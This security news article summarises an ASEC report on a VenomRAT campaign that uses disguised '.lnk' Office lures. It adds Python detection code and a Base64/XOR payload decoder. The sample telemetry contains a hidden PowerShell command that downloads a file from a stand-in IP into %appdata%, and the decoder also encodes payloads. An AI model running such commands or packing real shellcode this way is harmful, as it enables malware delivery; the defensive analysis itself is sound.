CyberSecurity SEE

Warning: Weaponized Office Documents Delivering VenomRAT

A recent report reveals that attackers are using weaponized Office-style lures to spread the VenomRAT malware. Researchers at AhnLab Security Intelligence Center (ASEC) identified the campaign. It does not rely on a vulnerability in Office itself: the attackers pass off a malicious shortcut file as an Office document to get the user to launch it, and that launch delivers VenomRAT, a remote access trojan that can execute commands, download additional scripts, and steal sensitive data from the infected system.

The technique observed in these attacks is a malicious shortcut file disguised as a Word document and bundled inside a compressed archive. The shortcut, named 'Survey.docx.lnk', uses a double extension so that it reads as a '.docx' file to the user. When opened, it runs commands that connect to an external URL and use PowerShell to download additional files into the %appdata% directory. The campaign also uses a file called 'blues.exe', which is disguised as a Korean company's certificate to persuade the user that nothing suspicious has run.
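The delivery chain described above (a double-extension shortcut spawning PowerShell that fetches a file over HTTP into %appdata%) is the kind of behaviour a detection engineer would want to match on. The following is an added example, not ASEC's code or detection logic: it checks filenames for the 'document.lnk' double-extension trick and scans process-creation events for a PowerShell download into the roaming profile. The events, the 203.0.113.10 address, and the command lines are constructed for the example; only the filenames 'Survey.docx.lnk' and 'qfqe.docx' come from the report.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import List

# Extensions that a shortcut or script will try to hide behind.
DOCUMENT_EXTENSIONS = {".docx", ".doc", ".xlsx", ".xls", ".pptx", ".pdf", ".hwp"}
# Windows never displays the .lnk suffix, so 'Survey.docx.lnk' renders as 'Survey.docx'.
SHORTCUT_EXTENSIONS = {".lnk"}

# Patterns for a PowerShell one-liner that pulls a file from the network
# into the user's roaming profile, as the report describes.
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    r"\b(iwr|invoke-webrequest|downloadfile|downloadstring|start-bitstransfer|curl|wget)\b",
    re.IGNORECASE,
)
APPDATA_RE = re.compile(r"%appdata%|\$env:appdata|\\appdata\\roaming", re.IGNORECASE)


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (what Sysmon event 1 or EDR telemetry carries)."""
    parent_image: str
    image: str
    command_line: str


def is_disguised_shortcut(filename: str) -> bool:
    """True when a shortcut carries a document extension in front of .lnk."""
    name = ntpath.basename(filename).lower()
    root, ext = ntpath.splitext(name)
    if ext not in SHORTCUT_EXTENSIONS:
        return False
    _, inner_ext = ntpath.splitext(root)
    return inner_ext in DOCUMENT_EXTENSIONS


def is_powershell_download_to_appdata(event: ProcessEvent) -> bool:
    """True when PowerShell is told to fetch something from a URL into %appdata%."""
    image = ntpath.basename(event.image).lower()
    if image not in {"powershell.exe", "pwsh.exe"}:
        return False
    cmd = event.command_line
    return bool(URL_RE.search(cmd) and DOWNLOAD_RE.search(cmd) and APPDATA_RE.search(cmd))


def triage(events: List[ProcessEvent]) -> List[ProcessEvent]:
    """Return the events that match the download-to-%appdata% pattern."""
    return [ev for ev in events if is_powershell_download_to_appdata(ev)]


# Constructed sample telemetry (not real logs from the campaign). The first event
# models a shortcut launched from Explorer; the other two are benign look-alikes.
SAMPLE_EVENTS = [
    ProcessEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        'powershell -w hidden -c "iwr http://203.0.113.10/qfqe.docx -OutFile $env:APPDATA\\qfqe.docx"',
    ),
    ProcessEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        '"WINWORD.EXE" /n "C:\\Users\\u\\Downloads\\Survey.docx"',
    ),
    ProcessEvent(
        r"C:\Windows\System32\cmd.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    ),
]

if __name__ == "__main__":
    for name in ("Survey.docx.lnk", "Survey.docx", "notes.lnk"):
        print(f"{name:20s} disguised shortcut: {is_disguised_shortcut(name)}")
    for ev in triage(SAMPLE_EVENTS):
        print("suspicious:", ntpath.basename(ev.parent_image), "->", ev.command_line)
```

The shortcut check is useful at the mail gateway and in archive inspection, where the real filename is still visible; the process check is the endpoint-side counterpart for when the lure has already been opened. Both are deliberately narrow, so pair them with the report's hashes and C&C URLs rather than treating either as complete coverage.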

The downloaded file, 'qfqe.docx', looks like an ordinary document but carries 'blues.exe', which acts as the malware downloader. When executed, it fetches further scripts through PowerShell, including 'sys.ps1', which in turn retrieves 'adb.dll' and loads it in memory rather than writing it to disk. 'adb.dll' holds an encoded shellcode: the data is Base64-decoded, then XOR-decrypted with the key string 'sorootktools', and the resulting shellcode is run. Layering a decoy document, a downloader, a script stage, and an in-memory payload in this way is meant to keep each component below the threshold that file-based scanning would flag.
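The two-layer decoding described above (Base64, then XOR with 'sorootktools') is straightforward to reproduce for analysis. The following is an added example, not ASEC's code and not a byte-accurate reconstruction of adb.dll: it assumes the payload is carried as Base64 text wrapping bytes XOR-ed with the key repeated across the data, which is the usual layout for this kind of loader, and the sample "shellcode" is a constructed NOP sled ending in an int3 so the block runs offline without touching anything real.

```python
import base64
from itertools import cycle

# Key string named in the ASEC write-up. The repeating-key layout is this
# example's assumption about how the loader applies it.
XOR_KEY = b"sorootktools"


def xor_with_key(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """XOR every byte of data with the key, repeating the key as needed.
    XOR is its own inverse, so one function both encodes and decodes."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def decode_payload(blob, key: bytes = XOR_KEY) -> bytes:
    """Reverse the scheme: drop whitespace a script may have wrapped the text
    with, Base64-decode, then XOR with the key. Accepts str or bytes."""
    if isinstance(blob, str):
        blob = blob.encode("ascii")
    text = b"".join(blob.split())  # tolerate line-wrapped Base64
    raw = base64.b64decode(text, validate=True)
    return xor_with_key(raw, key)


def encode_payload(shellcode: bytes, key: bytes = XOR_KEY) -> str:
    """Attacker-side view of the same scheme; here it only builds test data."""
    return base64.b64encode(xor_with_key(shellcode, key)).decode("ascii")


# Constructed, harmless stand-in for the real shellcode: four NOPs and an int3.
SAMPLE_SHELLCODE = b"\x90\x90\x90\x90\xcc"
SAMPLE_BLOB = encode_payload(SAMPLE_SHELLCODE)

if __name__ == "__main__":
    print("encoded blob :", SAMPLE_BLOB)
    recovered = decode_payload(SAMPLE_BLOB)
    print("decoded bytes:", recovered.hex())
    assert recovered == SAMPLE_SHELLCODE
```

When working from a real sample, feed decode_payload the string literal extracted from the script stage; if the output does not start with recognisable instruction bytes, the first things to re-check are the key (it may be applied as a different encoding or only to part of the buffer) and whether the Base64 text was reversed or otherwise obfuscated before being stored.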

Once VenomRAT is running, it carries out a range of malicious activities, including keylogging, exfiltrating system information, and executing whatever commands the threat actor sends from the C&C server. In practice that means the attacker can read sensitive data, control the compromised machine, and operate on it without the user noticing.

The report also provides a list of Indicators of Compromise (IOCs) to help security teams detect and respond to this threat: file and behaviour detection names, MD5 hashes of the samples, and the Command and Control (C&C) server URLs the malware contacts. Loading these into endpoint, proxy, and DNS controls lets organisations block known components of the campaign before they run.

The findings highlight how common and how polished document-themed malware delivery has become. Beyond keeping antivirus signatures current and training staff, the specific control this campaign calls for is to treat shortcut (.lnk) files that arrive inside archives or email attachments as hostile, since Windows never displays the .lnk extension even when "hide extensions for known file types" is turned off, so a user has no visual cue that 'Survey.docx' is not a document.

In conclusion, the growing reliance on cloud services, remote work, and digital communication tools gives attackers more opportunities to abuse the trust users place in office documents. As the ASEC findings demonstrate, individuals and organisations need to stay vigilant and apply these defensive practices to protect sensitive information from unauthorised access.
